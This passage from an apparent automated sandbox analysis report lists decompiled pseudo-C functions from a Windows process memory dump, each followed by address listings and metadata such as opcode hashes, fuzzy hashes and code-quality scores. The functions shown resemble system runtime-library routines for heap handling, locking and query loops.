                                                              							_t123 = 0;
                                                              							_t124[2] = _t30;
                                                              							 *_t80 = _t108;
                                                              							if(_t108 == 0) {
                                                              								L21:
                                                              								_t112 = 0x400;
                                                              								_push( &_v8);
                                                              								_v8 = 0x400;
                                                              								_push(_t124[2]);
                                                              								_push(0x400);
                                                              								_push(_t124[3]);
                                                              								_push(0);
                                                              								_push( *_t124);
                                                              								_t122 = E04BD9910();
                                                              								if(_t122 != 0xc0000023) {
                                                              									L26:
                                                              									if(_t122 != 0x106) {
                                                              										L40:
                                                              										if(_t122 < 0) {
                                                              											L29:
                                                              											_t83 = _t124[2];
                                                              											if(_t83 != 0) {
                                                              												_t59 =  &(_t124[5]); // 0x14
                                                              												if(_t83 != _t59) {
                                                              													L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                              												}
                                                              											}
                                                              											_push( *_t124);
                                                              											E04BD95D0();
                                                              											goto L33;
                                                              										}
                                                              										 *_a16 = _t124;
                                                              										return 0;
                                                              									}
                                                              									if(_t108 != 1) {
                                                              										_t122 = 0;
                                                              										goto L40;
                                                              									}
                                                              									_t122 = 0xc0000061;
                                                              									goto L29;
                                                              								} else {
                                                              									goto L22;
                                                              								}
                                                              								while(1) {
                                                              									L22:
                                                              									_t89 =  *0x4c87b9c; // 0x0
                                                              									_t92 = L04BB4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                              									_t124[2] = _t92;
                                                              									if(_t92 == 0) {
                                                              										break;
                                                              									}
                                                              									_t112 =  &_v8;
                                                              									_push( &_v8);
                                                              									_push(_t92);
                                                              									_push(_v8);
                                                              									_push(_t124[3]);
                                                              									_push(0);
                                                              									_push( *_t124);
                                                              									_t122 = E04BD9910();
                                                              									if(_t122 != 0xc0000023) {
                                                              										goto L26;
                                                              									}
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                              								}
                                                              								_t122 = 0xc0000017;
                                                              								goto L26;
                                                              							}
                                                              							_t119 = 0;
                                                              							do {
                                                              								_t114 = _t124[3];
                                                              								_t119 = _t119 + 0xc;
                                                              								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                              								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                              								_t123 = _t123 + 1;
                                                              								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                              							} while (_t123 < _t108);
                                                              							goto L21;
                                                              						}
                                                              						_push(0x28);
                                                              						_push(3);
                                                              						_t122 = E04B9A7B0();
                                                              						if(_t122 < 0) {
                                                              							goto L33;
                                                              						}
                                                              						_t124[4] = _t124[4] | 0x00000001;
                                                              						goto L18;
                                                              					}
                                                              					if((_t106 & 0x00000001) == 0) {
                                                              						_t115 = 0x28;
                                                              						_t122 = E04C2E7D3(_t115, _t124);
                                                              						if(_t122 < 0) {
                                                              							L9:
                                                              							_push(_t124);
                                                              							_push(0);
                                                              							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                              							goto L37;
                                                              						}
                                                              						L12:
                                                              						if( *_t124 != 0) {
                                                              							goto L18;
                                                              						}
                                                              						goto L13;
                                                              					}
                                                              					_t15 =  &(_t124[1]); // 0x4
                                                              					_t117 = 4;
                                                              					_t122 = E04C2E7D3(_t117, _t15);
                                                              					if(_t122 >= 0) {
                                                              						_t124[4] = _t124[4] | 0x00000001;
                                                              						_v12 = _v12 & 0x00000000;
                                                              						_push(4);
                                                              						_push( &_v12);
                                                              						_push(5);
                                                              						_push(0xfffffffe);
                                                              						E04BD95B0();
                                                              						goto L12;
                                                              					}
                                                              					goto L9;
                                                              				} else {
                                                              					return 0xc0000017;
                                                              				}
                                                              			}




















                                                              0x04c2bac8
                                                              0x04c2bac8
                                                              0x04c2baba
                                                              0x04c2bacd
                                                              0x04c2bacf
                                                              0x00000000
                                                              0x04c2bacf
                                                              0x04c2bb1a
                                                              0x00000000
                                                              0x04c2bb1c
                                                              0x04c2baa7
                                                              0x04c2bb11
                                                              0x00000000
                                                              0x04c2bb11
                                                              0x04c2baa9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2ba41
                                                              0x04c2ba41
                                                              0x04c2ba41
                                                              0x04c2ba58
                                                              0x04c2ba5d
                                                              0x04c2ba62
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2ba64
                                                              0x04c2ba67
                                                              0x04c2ba68
                                                              0x04c2ba69
                                                              0x04c2ba6c
                                                              0x04c2ba6f
                                                              0x04c2ba71
                                                              0x04c2ba78
                                                              0x04c2ba80
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2ba90
                                                              0x04c2ba90
                                                              0x04c2ba97
                                                              0x00000000
                                                              0x04c2ba97
                                                              0x04c2b9f5
                                                              0x04c2b9f7
                                                              0x04c2b9f7
                                                              0x04c2b9fa
                                                              0x04c2ba03
                                                              0x04c2ba07
                                                              0x04c2ba0c
                                                              0x04c2ba10
                                                              0x04c2ba17
                                                              0x00000000
                                                              0x04c2b9f7
                                                              0x04c2b9a6
                                                              0x04c2b9a8
                                                              0x04c2b9af
                                                              0x04c2b9b3
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2b9b9
                                                              0x00000000
                                                              0x04c2b9b9
                                                              0x04c2b94d
                                                              0x04c2b98f
                                                              0x04c2b995
                                                              0x04c2b999
                                                              0x04c2b960
                                                              0x04c2b967
                                                              0x04c2b968
                                                              0x04c2b96a
                                                              0x00000000
                                                              0x04c2b96a
                                                              0x04c2b99b
                                                              0x04c2b99e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2b99e
                                                              0x04c2b951
                                                              0x04c2b954
                                                              0x04c2b95a
                                                              0x04c2b95e
                                                              0x04c2b972
                                                              0x04c2b979
                                                              0x04c2b97d
                                                              0x04c2b97f
                                                              0x04c2b980
                                                              0x04c2b982
                                                              0x04c2b984
                                                              0x00000000
                                                              0x04c2b984
                                                              0x00000000
                                                              0x04c2b926
                                                              0x00000000
                                                              0x04c2b926

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3af6c3e560fa077f3e957ae12faa79119a82f7036156cf57280bcd55734348d9
                                                              • Instruction ID: 2bd40eb433986bece8ca1a8f8b0a24993853ae5d8d4b0d45355141a99190378f
                                                              • Opcode Fuzzy Hash: 3af6c3e560fa077f3e957ae12faa79119a82f7036156cf57280bcd55734348d9
                                                              • Instruction Fuzzy Hash: 8671EC32200B21EFE7219E15CA44B66B7B6EB40724F144968E6558B2A1FBB5FE40CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E04B952A5(char __ecx) {
                                                              				char _v20;
                                                              				char _v28;
                                                              				char _v29;
                                                              				void* _v32;
                                                              				void* _v36;
                                                              				void* _v37;
                                                              				void* _v38;
                                                              				void* _v40;
                                                              				void* _v46;
                                                              				void* _v64;
                                                              				void* __ebx;
                                                              				intOrPtr* _t49;
                                                              				signed int _t53;
                                                              				short _t85;
                                                              				signed int _t87;
                                                              				signed int _t88;
                                                              				signed int _t89;
                                                              				intOrPtr _t101;
                                                              				intOrPtr* _t102;
                                                              				intOrPtr* _t104;
                                                              				signed int _t106;
                                                              				void* _t108;
                                                              
                                                              				_t93 = __ecx;
                                                              				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                              				_push(_t88);
                                                              				_v29 = __ecx;
                                                              				_t89 = _t88 | 0xffffffff;
                                                              				while(1) {
                                                              					E04BAEEF0(0x4c879a0);
                                                              					_t104 =  *0x4c88210; // 0x2e61cc0
                                                              					if(_t104 == 0) {
                                                              						break;
                                                              					}
                                                              					asm("lock inc dword [esi]");
                                                              					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                              					E04BAEB70(_t93, 0x4c879a0);
                                                              					if( *((char*)(_t108 + 0xf)) != 0) {
                                                              						_t101 =  *0x7ffe02dc;
                                                              						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                              						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                              							L9:
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0x90028);
                                                              							_push(_t108 + 0x20);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push( *((intOrPtr*)(_t104 + 4)));
                                                              							_t53 = E04BD9890();
                                                              							__eflags = _t53;
                                                              							if(_t53 >= 0) {
                                                              								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                              								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                              									E04BAEEF0(0x4c879a0);
                                                              									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                              									E04BAEB70(0, 0x4c879a0);
                                                              								}
                                                              								goto L3;
                                                              							}
                                                              							__eflags = _t53 - 0xc0000012;
                                                              							if(__eflags == 0) {
                                                              								L12:
                                                              								_t13 = _t104 + 0xc; // 0x2e61ccd
                                                              								_t93 = _t13;
                                                              								 *((char*)(_t108 + 0x12)) = 0;
                                                              								__eflags = E04BCF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                              								if(__eflags >= 0) {
                                                              									L15:
                                                              									_t102 = _v28;
                                                              									 *_t102 = 2;
                                                              									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                              									E04BAEEF0(0x4c879a0);
                                                              									__eflags =  *0x4c88210 - _t104; // 0x2e61cc0
                                                              									if(__eflags == 0) {
                                                              										__eflags =  *((char*)(_t108 + 0xe));
                                                              										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                              										 *0x4c88210 = _t102;
                                                              										_t32 = _t102 + 0xc; // 0x0
                                                              										 *_t95 =  *_t32;
                                                              										_t33 = _t102 + 0x10; // 0x0
                                                              										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                              										_t35 = _t102 + 4; // 0xffffffff
                                                              										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                              										if(__eflags != 0) {
                                                              											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                              											E04C14888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                              										}
                                                              										E04BAEB70(_t95, 0x4c879a0);
                                                              										asm("lock xadd [esi], eax");
                                                              										if(__eflags == 0) {
                                                              											_push( *((intOrPtr*)(_t104 + 4)));
                                                              											E04BD95D0();
                                                              											L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              										}
                                                              										asm("lock xadd [esi], ebx");
                                                              										__eflags = _t89 == 1;
                                                              										if(_t89 == 1) {
                                                              											_push( *((intOrPtr*)(_t104 + 4)));
                                                              											E04BD95D0();
                                                              											L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              										}
                                                              										_t49 = _t102;
                                                              										L4:
                                                              										return _t49;
                                                              									}
                                                              									E04BAEB70(_t93, 0x4c879a0);
                                                              									asm("lock xadd [esi], eax");
                                                              									if(__eflags == 0) {
                                                              										_push( *((intOrPtr*)(_t104 + 4)));
                                                              										E04BD95D0();
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              									}
                                                              									 *_t102 = 1;
                                                              									asm("lock xadd [edi], eax");
                                                              									if(__eflags == 0) {
                                                              										_t28 = _t102 + 4; // 0xffffffff
                                                              										_push( *_t28);
                                                              										E04BD95D0();
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                              									}
                                                              									continue;
                                                              								}
                                                              								_t93 =  &_v20;
                                                              								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                              								_t85 = 6;
                                                              								_v20 = _t85;
                                                              								_t87 = E04BCF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                              								__eflags = _t87;
                                                              								if(_t87 < 0) {
                                                              									goto L3;
                                                              								}
                                                              								 *((char*)(_t108 + 0xe)) = 1;
                                                              								goto L15;
                                                              							}
                                                              							__eflags = _t53 - 0xc000026e;
                                                              							if(__eflags != 0) {
                                                              								goto L3;
                                                              							}
                                                              							goto L12;
                                                              						}
                                                              						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                              						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                              							goto L3;
                                                              						} else {
                                                              							goto L9;
                                                              						}
                                                              					}
                                                              					L3:
                                                              					_t49 = _t104;
                                                              					goto L4;
                                                              				}
                                                              				_t49 = 0;
                                                              				goto L4;
                                                              			}

























                                                              0x04bf0df9
                                                              0x04bf0dfe
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf0dfe
                                                              0x04b95303
                                                              0x04b95307
                                                              0x00000000
                                                              0x04b95309
                                                              0x00000000
                                                              0x04b95309
                                                              0x04b95307
                                                              0x04b952e9
                                                              0x04b952e9
                                                              0x00000000
                                                              0x04b952e9
                                                              0x04b9530e
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f69842f356664a4efc1b61fd7707ca46794256f28089dc52fab24667a4067842
                                                              • Instruction ID: 1700f74f430653cae567cd5aa22eb642784b64df7b7fac42534b4f8a73f60f11
                                                              • Opcode Fuzzy Hash: f69842f356664a4efc1b61fd7707ca46794256f28089dc52fab24667a4067842
                                                              • Instruction Fuzzy Hash: DB51CF71249341ABEB21EF24CC40B27BBE5FF40718F1449AEE59987661E770F848CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E04BAEF40(intOrPtr __ecx) {
                                                              				char _v5;
                                                              				char _v6;
                                                              				char _v7;
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t58;
                                                              				char _t59;
                                                              				signed char _t69;
                                                              				void* _t73;
                                                              				signed int _t74;
                                                              				char _t79;
                                                              				signed char _t81;
                                                              				signed int _t85;
                                                              				signed int _t87;
                                                              				intOrPtr _t90;
                                                              				signed char* _t91;
                                                              				void* _t92;
                                                              				signed int _t94;
                                                              				void* _t96;
                                                              
                                                              				_t90 = __ecx;
                                                              				_v16 = __ecx;
                                                              				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                              					_t58 =  *((intOrPtr*)(__ecx));
                                                              					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                              						E04B99080(_t73, __ecx, __ecx, _t92);
                                                              					}
                                                              				}
                                                              				_t74 = 0;
                                                              				_t96 =  *0x7ffe036a - 1;
                                                              				_v12 = 0;
                                                              				_v7 = 0;
                                                              				if(_t96 > 0) {
                                                              					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                              					_v12 = _t74;
                                                              					_v7 = _t96 != 0;
                                                              				}
                                                              				_t79 = 0;
                                                              				_v8 = 0;
                                                              				_v5 = 0;
                                                              				while(1) {
                                                              					L4:
                                                              					_t59 = 1;
                                                              					L5:
                                                              					while(1) {
                                                              						if(_t59 == 0) {
                                                              							L12:
                                                              							_t21 = _t90 + 4; // 0x77dfc21e
                                                              							_t87 =  *_t21;
                                                              							_v6 = 0;
                                                              							if(_t79 != 0) {
                                                              								if((_t87 & 0x00000002) != 0) {
                                                              									goto L19;
                                                              								}
                                                              								if((_t87 & 0x00000001) != 0) {
                                                              									_v6 = 1;
                                                              									_t74 = _t87 ^ 0x00000003;
                                                              								} else {
                                                              									_t51 = _t87 - 2; // -2
                                                              									_t74 = _t51;
                                                              								}
                                                              								goto L15;
                                                              							} else {
                                                              								if((_t87 & 0x00000001) != 0) {
                                                              									_v6 = 1;
                                                              									_t74 = _t87 ^ 0x00000001;
                                                              								} else {
                                                              									_t26 = _t87 - 4; // -4
                                                              									_t74 = _t26;
                                                              									if((_t74 & 0x00000002) == 0) {
                                                              										_t74 = _t74 - 2;
                                                              									}
                                                              								}
                                                              								L15:
                                                              								if(_t74 == _t87) {
                                                              									L19:
                                                              									E04B92D8A(_t74, _t90, _t87, _t90);
                                                              									_t74 = _v12;
                                                              									_v8 = 1;
                                                              									if(_v7 != 0 && _t74 > 0x64) {
                                                              										_t74 = _t74 - 1;
                                                              										_v12 = _t74;
                                                              									}
                                                              									_t79 = _v5;
                                                              									goto L4;
                                                              								}
                                                              								asm("lock cmpxchg [esi], ecx");
                                                              								if(_t87 != _t87) {
                                                              									_t74 = _v12;
                                                              									_t59 = 0;
                                                              									_t79 = _v5;
                                                              									continue;
                                                              								}
                                                              								if(_v6 != 0) {
                                                              									_t74 = _v12;
                                                              									L25:
                                                              									if(_v7 != 0) {
                                                              										if(_t74 < 0x7d0) {
                                                              											if(_v8 == 0) {
                                                              												_t74 = _t74 + 1;
                                                              											}
                                                              										}
                                                              										_t38 = _t90 + 0x14; // 0x0
                                                              										_t39 = _t90 + 0x14; // 0x0
                                                              										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                              										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                              											_t85 = _t85 & 0xff000000;
                                                              										}
                                                              										 *(_t90 + 0x14) = _t85;
                                                              									}
                                                              									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                              									return 0;
                                                              								}
                                                              								_v5 = 1;
                                                              								_t87 = _t74;
                                                              								goto L19;
                                                              							}
                                                              						}
                                                              						_t94 = _t74;
                                                              						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                              						if(_t74 == 0) {
                                                              							goto L12;
                                                              						} else {
                                                              							_t91 = _t90 + 4;
                                                              							goto L8;
                                                              							L9:
                                                              							while((_t81 & 0x00000001) != 0) {
                                                              								_t69 = _t81;
                                                              								asm("lock cmpxchg [edi], edx");
                                                              								if(_t69 != _t81) {
                                                              									_t81 = _t69;
                                                              									continue;
                                                              								}
                                                              								_t90 = _v16;
                                                              								goto L25;
                                                              							}
                                                              							asm("pause");
                                                              							_t94 = _t94 - 1;
                                                              							if(_t94 != 0) {
                                                              								L8:
                                                              								_t81 =  *_t91;
                                                              								goto L9;
                                                              							} else {
                                                              								_t90 = _v16;
                                                              								_t79 = _v5;
                                                              								goto L12;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              			}





























                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                              • Instruction ID: 0ea5bf53221496dacd15912fd678558e745a27fbb6cd4c80e0b02d7250d48a63
                                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                              • Instruction Fuzzy Hash: 4D51EF30A08249EFEB24CF68C0D07EEBBB1EF45314F1881E8D64597281D376B9A9D791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E04C6740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                              				signed short* _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _t55;
                                                              				void* _t56;
                                                              				intOrPtr* _t66;
                                                              				intOrPtr* _t69;
                                                              				void* _t74;
                                                              				intOrPtr* _t78;
                                                              				intOrPtr* _t81;
                                                              				intOrPtr* _t82;
                                                              				intOrPtr _t83;
                                                              				signed short* _t84;
                                                              				intOrPtr _t85;
                                                              				signed int _t87;
                                                              				intOrPtr* _t90;
                                                              				intOrPtr* _t93;
                                                              				intOrPtr* _t94;
                                                              				void* _t98;
                                                              
                                                              				_t84 = __edx;
                                                              				_t80 = __ecx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t55 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t87 =  *__edx & 0x0000ffff;
                                                              				_v12 = __ecx;
                                                              				_t3 = _t55 + 0x154; // 0x154
                                                              				_t93 = _t3;
                                                              				_t78 =  *_t93;
                                                              				_t4 = _t87 + 2; // 0x2
                                                              				_t56 = _t4;
                                                              				while(_t78 != _t93) {
                                                              					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                              						L4:
                                                              						_t78 =  *_t78;
                                                              						continue;
                                                              					} else {
                                                              						_t7 = _t78 + 0x18; // 0x18
                                                              						if(E04BED4F0(_t7, _t84[2], _t87) == _t87) {
                                                              							_t40 = _t78 + 0xc; // 0xc
                                                              							_t94 = _t40;
                                                              							_t90 =  *_t94;
                                                              							while(_t90 != _t94) {
                                                              								_t41 = _t90 + 8; // 0x8
                                                              								_t74 = E04BDF380(_a4, _t41, 0x10);
                                                              								_t98 = _t98 + 0xc;
                                                              								if(_t74 != 0) {
                                                              									_t90 =  *_t90;
                                                              									continue;
                                                              								}
                                                              								goto L12;
                                                              							}
                                                              							_t82 = L04BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                              							if(_t82 != 0) {
                                                              								_t46 = _t78 + 0xc; // 0xc
                                                              								_t69 = _t46;
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								_t85 =  *_t69;
                                                              								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              									L20:
                                                              									_t82 = 3;
                                                              									asm("int 0x29");
                                                              								}
                                                              								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                              								 *_t82 = _t85;
                                                              								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                              								 *_t69 = _t82;
                                                              								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                              								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                              								goto L11;
                                                              							} else {
                                                              								L18:
                                                              								_push(0xe);
                                                              								_pop(0);
                                                              							}
                                                              						} else {
                                                              							_t84 = _v8;
                                                              							_t9 = _t87 + 2; // 0x2
                                                              							_t56 = _t9;
                                                              							goto L4;
                                                              						}
                                                              					}
                                                              					L12:
                                                              					return 0;
                                                              				}
                                                              				_t10 = _t87 + 0x1a; // 0x1a
                                                              				_t78 = L04BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                              				if(_t78 == 0) {
                                                              					goto L18;
                                                              				} else {
                                                              					_t12 = _t87 + 2; // 0x2
                                                              					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                              					_t16 = _t78 + 0x18; // 0x18
                                                              					E04BDF3E0(_t16, _v8[2], _t87);
                                                              					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                              					_t19 = _t78 + 0xc; // 0xc
                                                              					_t66 = _t19;
                                                              					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                              					 *_t66 = _t66;
                                                              					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                              					_t81 = L04BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                              					if(_t81 == 0) {
                                                              						goto L18;
                                                              					} else {
                                                              						_t26 = _t78 + 0xc; // 0xc
                                                              						_t69 = _t26;
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						_t85 =  *_t69;
                                                              						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              							goto L20;
                                                              						} else {
                                                              							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                              							 *_t81 = _t85;
                                                              							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                              							 *_t69 = _t81;
                                                              							_t83 = _v12;
                                                              							 *(_t78 + 8) = 1;
                                                              							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                              							_t34 = _t83 + 0x154; // 0x1ba
                                                              							_t69 = _t34;
                                                              							_t85 =  *_t69;
                                                              							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              								goto L20;
                                                              							} else {
                                                              								 *_t78 = _t85;
                                                              								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                              								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                              								 *_t69 = _t78;
                                                              								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                              							}
                                                              						}
                                                              						goto L11;
                                                              					}
                                                              				}
                                                              				goto L12;
                                                              			}






















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                              • Instruction ID: 2081e35e81b45ab5027d005e0af6161437620c0bc252ae0739f45858ace69c0f
                                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                              • Instruction Fuzzy Hash: CC516D71601606EFDB15CF54C480A96BBB6FF45308F19C5EAE9099F212E371EA45CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E04BC4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				char _v176;
                                                              				char _v177;
                                                              				char _v184;
                                                              				intOrPtr _v192;
                                                              				intOrPtr _v196;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed short _t42;
                                                              				char* _t44;
                                                              				intOrPtr _t46;
                                                              				intOrPtr _t50;
                                                              				char* _t57;
                                                              				intOrPtr _t59;
                                                              				intOrPtr _t67;
                                                              				signed int _t69;
                                                              
                                                              				_t64 = __edx;
                                                              				_v12 =  *0x4c8d360 ^ _t69;
                                                              				_t65 = 0xa0;
                                                              				_v196 = __edx;
                                                              				_v177 = 0;
                                                              				_t67 = __ecx;
                                                              				_v192 = __ecx;
                                                              				E04BDFA60( &_v176, 0, 0xa0);
                                                              				_t57 =  &_v176;
                                                              				_t59 = 0xa0;
                                                              				if( *0x4c87bc8 != 0) {
                                                              					L3:
                                                              					while(1) {
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						_t67 = _v192;
                                                              						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                              						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                              						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                              						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                              						_push( &_v184);
                                                              						_push(_t59);
                                                              						_push(_t57);
                                                              						_push(0xa0);
                                                              						_push(_t57);
                                                              						_push(0xf);
                                                              						_t42 = E04BDB0B0();
                                                              						if(_t42 != 0xc0000023) {
                                                              							break;
                                                              						}
                                                              						if(_v177 != 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                              						}
                                                              						_v177 = 1;
                                                              						_t44 = L04BB4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                              						_t59 = _v184;
                                                              						_t57 = _t44;
                                                              						if(_t57 != 0) {
                                                              							continue;
                                                              						} else {
                                                              							_t42 = 0xc0000017;
                                                              							break;
                                                              						}
                                                              					}
                                                              					if(_t42 != 0) {
                                                              						_t65 = E04B9CCC0(_t42);
                                                              						if(_t65 != 0) {
                                                              							L10:
                                                              							if(_v177 != 0) {
                                                              								if(_t57 != 0) {
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                              								}
                                                              							}
                                                              							_t46 = _t65;
                                                              							L12:
                                                              							return E04BDB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                              						}
                                                              						L7:
                                                              						_t50 = _a4;
